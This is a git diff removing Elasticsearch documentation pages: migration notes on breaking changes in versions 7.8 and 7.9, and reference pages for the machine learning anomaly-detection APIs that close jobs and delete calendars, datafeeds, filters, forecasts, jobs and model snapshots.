-++++
-
-This section discusses the changes that you need to be aware of when migrating
-your application to {es} 7.8.
-
-See also <> and <>.
-
-* <>
-* <>
-* <>
-* <>
-
-//NOTE: The notable-breaking-changes tagged regions are re-used in the
-//Installation and Upgrade Guide
-
-//tag::notable-breaking-changes[]
-
-[discrete]
-[[breaking_781_license_changes]]
-=== License Information changes
-
-The following change applies as of the `7.8.1` release.
-
-.Displays Enterprise license as Platinum in /_xpack
-[%collapsible]
-====
-*Details* +
-The `GET /_license` endpoint displays Enterprise licenses as
-Platinum by default so that old clients (including Beats, Kibana and
-Logstash) know to interpret this new license type as if it were a
-Platinum license.
-
-This compatibility layer was not applied to the `GET /_xpack/`
-endpoint, which also displays a license type and mode. {es-pull}58217[#58217]
-====
-
-
-[discrete]
-[[breaking_78_aggregation_changes]]
-=== Aggregation changes
-
-.Privilege `indices:admin/create` will no longer allow the auto creation of indices
-[%collapsible]
-====
-*Details* +
-The privilege named `indices:admin/create` will no longer allow the auto
-creation of indices. Use `create_index` instead. {es-pull}55858[#55858]
-====
-
-.`value_count` aggregation optimization
-[%collapsible]
-====
-*Details* +
-Scripts used in `value_count` will now receive a number if they are
-counting a numeric field and a `GeoPoint` if they are counting a
-`geo_point` field. They used to always receive the `String`
-representation of those values. {es-pull}54854[#54854]
-====
-
-[discrete]
-[[breaking_78_mappings_changes]]
-=== Mappings changes
-
-[[prevent-enabled-setting-change]]
-.The `enabled` mapping parameter cannot be changed for a root mapping.
-[%collapsible]
-====
-*Details* +
-Mapping requests that attempt to change the {ref}/enabled.html[`enabled`]
-mapping parameter for a root mapping will fail and return an error.
-
-Previously, {es} accepted mapping requests that attempted to change the
-`enabled` parameter of the root mapping. These changes were not applied, but
-such requests didn't return an error.
-
-*Impact* +
-To avoid errors, do not submit mapping requests that change the
-{ref}/enabled.html[`enabled`] mapping parameter.
-====
-
-[[prevent-include-in-root-change]]
-.The `include_in_parent` and `include_in_root` mapping parameters cannot be changed for `nested` fields.
-[%collapsible]
-====
-*Details* +
-Mapping requests that attempt to change the
-{ref}/nested.html#nested-include-in-parent-parm[`include_in_parent`] or
-{ref}/nested.html#nested-include-in-root-parm[`include_in_root`] mapping
-parameter for a `nested` field will fail and return an error.
-
-Previously, {es} accepted mapping requests that attempted to change the
-`include_in_parent` or `include_in_root` parameter. These changes were not
-applied, but such requests didn't return an error.
-
-*Impact* +
-To avoid errors, do not submit mapping requests that change the
-{ref}/nested.html#nested-include-in-parent-parm[`include_in_parent`] or
-{ref}/nested.html#nested-include-in-root-parm[`include_in_root`] mapping
-parameter.
-====
-
-.The get field mapping API's `local` query parameter is deprecated.
-[%collapsible] -==== -*Details* + -The {ref}/indices-get-field-mapping.html[get field mapping API]'s `local` query -parameter is deprecated and will be removed in {es} 8.0.0. - -The `local` parameter is a no-op. The API always retrieves field mappings -locally. - -*Impact* + -To avoid deprecation warnings, discontinue use of the `local` parameter. -==== - -[discrete] -[[breaking_78_settings_changes]] -=== Settings changes - -[[deprecate-node-local-storage]] -.The `node.local_storage` setting is deprecated. -[%collapsible] -==== -*Details* + -The `node.local_storage` setting is deprecated. In {es} 8.0.0, all nodes require -local storage. - -*Impact* + -To avoid deprecation warnings, discontinue use of the `node.local_storage` -setting. -==== - -[[deprecate-basic-license-feature-enabled]] - -.Several {xpack} settings no longer have any effect and are deprecated. - -[%collapsible] -==== -*Details* + -Basic {xpack} license features are always enabled for the {default-dist} -and the following settings no longer have any effect: - -* `xpack.enrich.enabled` -* `xpack.flattened.enabled` -* `xpack.ilm.enabled` -* `xpack.monitoring.enabled` -* `xpack.rollup.enabled` -* `xpack.slm.enabled` -* `xpack.sql.enabled` -* `xpack.transform.enabled` -* `xpack.vectors.enabled` - -Previously, they could be set to `false` to disable the feature's APIs in a cluster. - -*Impact* + -To avoid deprecation warnings, discontinue use of these settings. -If you have disabled ILM so that you can use another tool to manage Watcher -indices, the newly introduced `xpack.watcher.use_ilm_index_management` setting -may be set to false. -==== - -[discrete] -[[builtin-users-changes]] -==== Changes to built-in users - -.The `kibana` user has been deprecated in favor of the `kibana_system` user. -[%collapsible] -==== -*Details* + -The `kibana` user was historically used to authenticate {kib} to {es}. -The name of this user was confusing, and was often mistakenly used to login to {kib}. -We've replaced the `kibana` user with the `kibana_system` user to reduce -confusion and to better align with other built-in system accounts. - -*Impact* + -If your `kibana.yml` used to contain: -[source,yaml] --------------------------------------------------- -elasticsearch.username: kibana --------------------------------------------------- - -then you should update to use the new `kibana_system` user instead: -[source,yaml] --------------------------------------------------- -elasticsearch.username: kibana_system --------------------------------------------------- - -IMPORTANT: The new `kibana_system` user does not preserve the previous `kibana` -user password. You must explicitly set a password for the `kibana_system` user. -==== - - -[discrete] -[[builtin-roles-changes]] -==== Changes to built-in roles - -.The `kibana_user` role has been deprecated in favor of the `kibana_admin` role. -[%collapsible] -==== -*Details* + -Users who were previously assigned the `kibana_user` role should instead be assigned -the `kibana_admin` role. This role grants the same set of privileges as `kibana_user`, but has been -renamed to better reflect its intended use. - -*Impact* + -Assign users with the `kibana_user` role to the `kibana_admin` role. -Discontinue use of the `kibana_user` role. 
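-
-As a sketch, assuming an existing user named `jdoe` (the username is only
-illustrative), the role can be switched with the create or update users API;
-note that the `roles` array sent here replaces the user's current role list:
-
-[source,js]
-----
-PUT /_security/user/jdoe
-{
-  "roles": [ "kibana_admin" ]
-}
-----
-// NOTCONSOLE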
-==== - -//end::notable-breaking-changes[] diff --git a/docs/reference/migration/migrate_7_9.asciidoc b/docs/reference/migration/migrate_7_9.asciidoc deleted file mode 100644 index 2e4bf4c17b9..00000000000 --- a/docs/reference/migration/migrate_7_9.asciidoc +++ /dev/null @@ -1,160 +0,0 @@ -[[breaking-changes-7.9]] -== Breaking changes in 7.9 -++++ -7.9 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to {es} 7.9. - -See also <> and <>. - -* <> -* <> -* <> - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] -[discrete] -[[breaking_79_indices_changes]] -=== Indices changes -.{es} includes built-in index templates for `logs-*-*` and `metrics-*-*`. - -[%collapsible] -==== -*Details* + -In 7.9, {es} added built-in index templates for the `metrics-*-*` and -`logs-*-*` index patterns, each with a priority of `100`. -{ingest-guide}/ingest-management-overview.html[{agent}] uses these templates to -create data streams. - -*Impact* + -If you use {agent}, assign your index templates a priority -lower than `100` to avoid overriding the built-in templates. - -Otherwise, to avoid accidentally applying the built-in templates, use a -non-overlapping index pattern or assign templates with an overlapping pattern a -`priority` higher than `100`. - -For example, if you don't use {agent} and want to use a template for the -`logs-*` index pattern, assign your template a priority of `200`. This ensures -your template is applied instead of the built-in template for `logs-*-*`. -==== -//end::notable-breaking-changes[] - -//tag::notable-breaking-changes[] -[discrete] -[[breaking_79_script_cache_changes]] -=== Script cache changes -[[deprecate_general_script_cache_size]] -.The `script.cache.max_size` setting is deprecated. - -[%collapsible] -==== -*Details* + -The `script.cache.max_size` setting is deprecated. In {es} 8.0.0, this is -set per-context. - -*Impact* + -To avoid deprecation warnings, discontinue use of the `script.cache.max_size` -setting. You may use `script.context.$CONTEXT.cache_max_size` for the particular context. -For example, for the `ingest` context, use `script.context.ingest.cache_max_size`. - -==== - -[discrete] -[[deprecate_general_script_expire]] -.The `script.cache.expire` setting is deprecated. - -[%collapsible] -==== -*Details* + -The `script.cache.expire` setting is deprecated. In {es} 8.0.0, this is -set per-context. - -*Impact* + -To avoid deprecation warnings, discontinue use of the `script.cache.expire` -setting. You may use `script.context.$CONTEXT.cache_expire` for the particular context. -For example, for the `update` context, use `script.context.update.cache_expire`. - -==== - -[discrete] -[[deprecate_general_script_compile_rate]] -.The `script.max_compilations_rate` setting is deprecated. - -[%collapsible] -==== -*Details* + -The `script.max_compilations_rate` setting is deprecated. In {es} 8.0.0, this is -set per-context. - -*Impact* + -To avoid deprecation warnings, discontinue use of the `script.max_compilations_rate` -setting. You may use `script.context.$CONTEXT.max_compilations_rate` for the particular -context. For example, for the `processor_conditional` context, use -`script.context.processor_conditional.max_compilations_rate`. - -==== - -[discrete] -[[deprecate_mapping_updates_for_ingest_privileges]] -.Mapping actions have been deprecated for the `create_doc`, `create`, `index` and `write` privileges. 
-[%collapsible] -==== -*Details* + -In {es} 8.0.0, the following privileges will no longer allow users to -explicitly update the mapping of an index: - -* `create_doc` -* `create` -* `index` -* `write` - -Additionally, in {es} 8.0.0, the following privileges will no longer allow users to -{ref}/dynamic-mapping.html[dynamically update the mapping] of an index -during indexing or ingest: - -* `create_doc` -* `create` -* `index` - -These privileges will continue to allow mapping actions on indices (but not on data streams) until -{es} 8.0.0. However, deprecation warnings will be returned. - -*Impact* + -To allow users to explicitly update the mapping of an index, -grant the `manage` privilege. - -To dynamically update the mapping of an index during indexing or -ingest, grant the `auto_configure` privilege and use index templates. This lets -you dynamically update the index mapping based on the template's mapping configuration. -==== - -[discrete] -[[breaking_79_settings_changes]] -=== Settings changes - -[[deprecate_auto_import_dangling_indices]] -.Automatically importing dangling indices is disabled by default. - -[%collapsible] -==== -*Details* + -Automatically importing <> into the cluster -is unsafe and is now disabled by default. This feature will be removed entirely -in {es} 8.0.0. - -*Impact* + -Use the <> to list, delete or import -any dangling indices manually. - -Alternatively you can enable automatic imports of dangling indices, recovering -the unsafe behaviour of earlier versions, by setting -`gateway.auto_import_dangling_indices` to `true`. This setting is deprecated -and will be removed in {es} 8.0.0. We do not recommend using this setting. - -==== -//end::notable-breaking-changes[] diff --git a/docs/reference/migration/migration.asciidoc b/docs/reference/migration/migration.asciidoc deleted file mode 100644 index bf46b3b5a5b..00000000000 --- a/docs/reference/migration/migration.asciidoc +++ /dev/null @@ -1,10 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[migration-api]] -== Migration APIs - -The migration APIs simplify upgrading {xpack} indices from one version to another. - -* <> - -include::apis/deprecation.asciidoc[] diff --git a/docs/reference/ml/anomaly-detection/apis/close-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/close-job.asciidoc deleted file mode 100644 index 1fa767da583..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/close-job.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-close-job]] -= Close {anomaly-jobs} API -++++ -Close jobs -++++ - -Closes one or more {anomaly-jobs}. -A job can be opened and closed multiple times throughout its lifecycle. - -A closed job cannot receive data or perform analysis -operations, but you can still explore and navigate results. - -[[ml-close-job-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//_close` + - -`POST _ml/anomaly_detectors/,/_close` + - -`POST _ml/anomaly_detectors/_all/_close` + - -[[ml-close-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. -* Before you can close an {anomaly-job}, you must stop its {dfeed}. See -<>. - -[[ml-close-job-desc]] -== {api-description-title} - -You can close multiple {anomaly-jobs} in a single API request by using a group -name, a comma-separated list of jobs, or a wildcard expression. You can close -all jobs by using `_all` or by specifying `*` as the ``. 
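For example, the following minimal sketch closes two jobs in a single request (the second job identifier is hypothetical):

[source,console]
--------------------------------------------------
POST _ml/anomaly_detectors/low_request_rate,response_code_rates/_close
--------------------------------------------------
// TEST[skip:hypothetical job identifiers]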
- -When you close a job, it runs housekeeping tasks such as pruning the model history, -flushing buffers, calculating final results and persisting the model snapshots. -Depending upon the size of the job, it could take several minutes to close and -the equivalent time to re-open. - -After it is closed, the job has a minimal overhead on the cluster except for -maintaining its meta data. Therefore it is a best practice to close jobs that -are no longer required to process data. - -When a {dfeed} that has a specified end date stops, it automatically closes -the job. - -NOTE: If you use the `force` query parameter, the request returns without performing -the associated actions such as flushing buffers and persisting the model snapshots. -Therefore, do not use this parameter if you want the job to be in a consistent state -after the close job API returns. The `force` query parameter should only be used in -situations where the job has already failed, or where you are not interested in -results the job might have recently produced or might produce in the future. - -[[ml-close-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-wildcard] - -[[ml-close-job-query-parms]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-jobs] - -`force`:: -(Optional, Boolean) Use to close a failed job, or to forcefully close a job -which has not responded to its initial close request. - -`timeout`:: -(Optional, <>) Controls the time to wait until a job -has closed. The default value is 30 minutes. - -[[ml-close-job-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - -[[ml-close-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/low_request_rate/_close --------------------------------------------------- -// TEST[skip:sometimes fails due to https://github.com/elastic/elasticsearch/pull/48583#issuecomment-552991325 - on unmuting use setup:server_metrics_openjob-raw] - -When the job is closed, you receive the following results: - -[source,console-result] ----- -{ - "closed": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-calendar-event.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-calendar-event.asciidoc deleted file mode 100644 index 04120ff327f..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-calendar-event.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-calendar-event]] -= Delete events from calendar API -++++ -Delete events from calendar -++++ - -Deletes scheduled events from a calendar. - -[[ml-delete-calendar-event-request]] -== {api-request-title} - -`DELETE _ml/calendars//events/` - -[[ml-delete-calendar-event-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-calendar-event-desc]] -== {api-description-title} - -This API removes individual events from a calendar. To remove all scheduled -events and delete the calendar, see the -<>. 
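If you do not know an event identifier, you can list the calendar's scheduled events first. A minimal sketch, using the `planned-outages` calendar from the example below:

[source,console]
--------------------------------------------------
GET _ml/calendars/planned-outages/events
--------------------------------------------------
// TEST[skip:calendar may not exist]

Each event in the response includes an `event_id` value that you can pass to this API.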
- -[[ml-delete-calendar-event-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -``:: -(Required, string) Identifier for the scheduled event. You can obtain this -identifier by using the <>. - -[[ml-delete-calendar-event-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/calendars/planned-outages/events/LS8LJGEBMTCMA-qz49st --------------------------------------------------- -// TEST[skip:catch:missing] - -When the event is removed, you receive the following results: -[source,js] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-calendar-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-calendar-job.asciidoc deleted file mode 100644 index d16a742e5dc..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-calendar-job.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-calendar-job]] -= Delete {anomaly-jobs} from calendar API -++++ -Delete jobs from calendar -++++ - -Deletes {anomaly-jobs} from a calendar. - -[[ml-delete-calendar-job-request]] -== {api-request-title} - -`DELETE _ml/calendars//jobs/` - -[[ml-delete-calendar-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-calendar-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-list] - -[[ml-delete-calendar-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/calendars/planned-outages/jobs/total-requests --------------------------------------------------- -// TEST[skip:setup:calendar_outages_addjob] - -When the job is removed from the calendar, you receive the following -results: - -[source,console-result] ----- -{ - "calendar_id": "planned-outages", - "job_ids": [] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-calendar.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-calendar.asciidoc deleted file mode 100644 index 388ec663772..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-calendar.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-calendar]] -= Delete calendars API -++++ -Delete calendars -++++ - -Deletes a calendar. - -[[ml-delete-calendar-request]] -== {api-request-title} - -`DELETE _ml/calendars/` - -[[ml-delete-calendar-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-calendar-desc]] -== {api-description-title} - -This API removes all scheduled events from the calendar then deletes the -calendar. 
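Because deleting a calendar also removes its scheduled events, you may want to review the calendar first. A minimal sketch, using the `planned-outages` calendar from the example below:

[source,console]
--------------------------------------------------
GET _ml/calendars/planned-outages
--------------------------------------------------
// TEST[skip:calendar may not exist]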
- -[[ml-delete-calendar-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -[[ml-delete-calendar-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/calendars/planned-outages --------------------------------------------------- -// TEST[skip:setup:calendar_outages] - -When the calendar is deleted, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-datafeed.asciidoc deleted file mode 100644 index 38c6dcd2ab9..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-datafeed.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-datafeed]] -= Delete {dfeeds} API - -[subs="attributes"] -++++ -Delete {dfeeds} -++++ - -Deletes an existing {dfeed}. - -[[ml-delete-datafeed-request]] -== {api-request-title} - -`DELETE _ml/datafeeds/` - -[[ml-delete-datafeed-prereqs]] -== {api-prereq-title} - -* Unless you use the `force` parameter, you must stop the {dfeed} before you -can delete it. -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -[[ml-delete-datafeed-query-parms]] -== {api-query-parms-title} - -`force`:: - (Optional, Boolean) Use to forcefully delete a started {dfeed}; this method is - quicker than stopping and deleting the {dfeed}. - -[[ml-delete-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/datafeeds/datafeed-total-requests --------------------------------------------------- -// TEST[skip:setup:server_metrics_datafeed] - -When the {dfeed} is deleted, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-expired-data.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-expired-data.asciidoc deleted file mode 100644 index bfe45e4c27b..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-expired-data.asciidoc +++ /dev/null @@ -1,74 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-expired-data]] -= Delete expired data API -++++ -Delete expired data -++++ - -Deletes expired and unused machine learning data. - -[[ml-delete-expired-data-request]] -== {api-request-title} - -`DELETE _ml/_delete_expired_data` + - -`DELETE _ml/_delete_expired_data/` - -[[ml-delete-expired-data-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-expired-data-desc]] -== {api-description-title} - -Deletes all job results, model snapshots and forecast data that have exceeded -their `retention days` period. Machine learning state documents that are not -associated with any job are also deleted. - -You can limit the request to a single or set of {anomaly-jobs} by using a job identifier, -a group name, a comma-separated list of jobs, or a wildcard expression. 
-You can delete expired data for all {anomaly-jobs} by using `_all`, by specifying -`*` as the ``, or by omitting the ``. - -[[ml-delete-expired-data-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) -Identifier for an {anomaly-job}. It can be a job identifier, a group name, or a -wildcard expression. - -[[ml-delete-expired-data-request-body]] -== {api-request-body-title} - -`requests_per_second`:: -(Optional, float) The desired requests per second for the deletion processes. -The default behavior is no throttling. - -`timeout`:: -(Optional, string) How long can the underlying delete processes run until they are canceled. -The default value is `8h` (8 hours). - -[[ml-delete-expired-data-example]] -== {api-examples-title} - -The endpoint takes no arguments: - -[source,console] --------------------------------------------------- -DELETE _ml/_delete_expired_data --------------------------------------------------- -// TEST - -When the expired data is deleted, you receive the following response: - -[source,console-result] ----- -{ - "deleted": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-filter.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-filter.asciidoc deleted file mode 100644 index 94431a2f3e1..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-filter.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-filter]] -= Delete filters API -++++ -Delete filters -++++ - -Deletes a filter. - -[[ml-delete-filter-request]] -== {api-request-title} - -`DELETE _ml/filters/` - -[[ml-delete-filter-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-filter-desc]] -== {api-description-title} - -This API deletes a {ml-docs}/ml-rules.html[filter]. -If a {ml} job references the filter, you cannot delete the filter. You must -update or delete the job before you can delete the filter. - -[[ml-delete-filter-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=filter-id] - -[[ml-delete-filter-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/filters/safe_domains --------------------------------------------------- -// TEST[skip:setup:ml_filter_safe_domains] - -When the filter is deleted, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-forecast.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-forecast.asciidoc deleted file mode 100644 index 9d39712944c..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-forecast.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-forecast]] -= Delete forecasts API -++++ -Delete forecasts -++++ - -Deletes forecasts from a {ml} job. - -[[ml-delete-forecast-request]] -== {api-request-title} - -`DELETE _ml/anomaly_detectors//_forecast` + - -`DELETE _ml/anomaly_detectors//_forecast/` + - -`DELETE _ml/anomaly_detectors//_forecast/_all` - -[[ml-delete-forecast-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. 
- -[[ml-delete-forecast-desc]] -== {api-description-title} - -By default, forecasts are retained for 14 days. You can specify a different -retention period with the `expires_in` parameter in the -<>. The delete forecast API enables you to delete -one or more forecasts before they expire. - -NOTE: When you delete a job, its associated forecasts are deleted. - -For more information, see -{ml-docs}/ml-overview.html#ml-forecasting[Forecasting the future]. - -[[ml-delete-forecast-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) A comma-separated list of forecast identifiers. If you do not -specify this optional parameter or if you specify `_all` or `*` the API deletes all -forecasts from the job. - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - - -[[ml-delete-forecast-query-parms]] -== {api-query-parms-title} - -`allow_no_forecasts`:: - (Optional, Boolean) Specifies whether an error occurs when there are no - forecasts. In particular, if this parameter is set to `false` and there are no - forecasts associated with the job, attempts to delete all forecasts return an - error. The default value is `true`. - -`timeout`:: - (Optional, <>) Specifies the period of time to wait - for the completion of the delete operation. When this period of time elapses, - the API fails and returns an error. The default value is `30s`. - -[[ml-delete-forecast-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/anomaly_detectors/total-requests/_forecast/_all --------------------------------------------------- -// TEST[skip:setup:server_metrics_openjob] - -If the request does not encounter errors, you receive the following result: - -[source,js] ----- -{ - "acknowledged": true -} ----- -// NOTCONSOLE diff --git a/docs/reference/ml/anomaly-detection/apis/delete-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-job.asciidoc deleted file mode 100644 index 13e0bc7f7c3..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-job.asciidoc +++ /dev/null @@ -1,92 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-job]] -= Delete {anomaly-jobs} API -++++ -Delete jobs -++++ - -Deletes an existing {anomaly-job}. - -[[ml-delete-job-request]] -== {api-request-title} - -`DELETE _ml/anomaly_detectors/` - -[[ml-delete-job-prereqs]] -== {api-prereq-title} - -* If {es} {security-features} are enabled, you must have `manage_ml` or `manage` -cluster privileges to use this API. See <> and -{ml-docs-setup-privileges}. -* Before you can delete a job, you must delete the {dfeeds} that are associated -with it. See <>. -* Before you can delete a job, you must close it (unless you specify the `force` parameter). See <>. - -[[ml-delete-job-desc]] -== {api-description-title} - -All job configuration, model state and results are deleted. - -IMPORTANT: Deleting an {anomaly-job} must be done via this API only. Do not -delete the job directly from the `.ml-*` indices using the {es} delete document -API. When {es} {security-features} are enabled, make sure no `write` privileges -are granted to anyone over the `.ml-*` indices. - -It is not currently possible to delete multiple jobs using wildcards or a comma -separated list. 
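If you need to remove several jobs, issue one delete request per job. A minimal curl sketch with hypothetical job identifiers, assuming an unsecured cluster on `localhost:9200` as in the find file structure curl example:

[source,js]
----
# Hypothetical job identifiers; the cluster address and lack of
# authentication are assumptions for this sketch.
for JOB_ID in job-1 job-2 job-3; do
  curl -s -X DELETE "localhost:9200/_ml/anomaly_detectors/${JOB_ID}"
done
----
// NOTCONSOLE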
- -[[ml-delete-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-delete-job-query-parms]] -== {api-query-parms-title} - -`force`:: -(Optional, Boolean) Use to forcefully delete an opened job; this method is -quicker than closing and deleting the job. - -`wait_for_completion`:: -(Optional, boolean) Specifies whether the request should return immediately or -wait until the job deletion completes. Defaults to `true`. - -[[ml-delete-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/anomaly_detectors/total-requests --------------------------------------------------- -// TEST[skip:setup:server_metrics_job] - -When the job is deleted, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- - -In the next example we delete the `total-requests` job asynchronously: - -[source,console] --------------------------------------------------- -DELETE _ml/anomaly_detectors/total-requests?wait_for_completion=false --------------------------------------------------- -// TEST[skip:setup:server_metrics_job] - -When `wait_for_completion` is set to `false`, the response contains the id -of the job deletion task: - -[source,console-result] ----- -{ - "task": "oTUltX4IQMOUUVeiohTt8A:39" -} ----- -// TESTRESPONSE[s/"task": "oTUltX4IQMOUUVeiohTt8A:39"/"task": $body.task/] diff --git a/docs/reference/ml/anomaly-detection/apis/delete-snapshot.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-snapshot.asciidoc deleted file mode 100644 index 26cb641c6b6..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-snapshot.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-snapshot]] -= Delete model snapshots API -++++ -Delete model snapshots -++++ - -Deletes an existing model snapshot. - -[[ml-delete-snapshot-request]] -== {api-request-title} - -`DELETE _ml/anomaly_detectors//model_snapshots/` - -[[ml-delete-snapshot-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See <> and -{ml-docs-setup-privileges}. - -[[ml-delete-snapshot-desc]] -== {api-description-title} - -IMPORTANT: You cannot delete the active model snapshot. To delete that snapshot, -first revert to a different one. To identify the active model snapshot, refer to -the `model_snapshot_id` in the results from the get jobs API. 
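For example, a minimal sketch of checking the active snapshot for the `farequote` job used in the example below:

[source,console]
--------------------------------------------------
GET _ml/anomaly_detectors/farequote
--------------------------------------------------
// TEST[skip:job may not exist]

Once the job has an active snapshot, the job configuration in the response includes a `model_snapshot_id` field; do not attempt to delete that snapshot.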
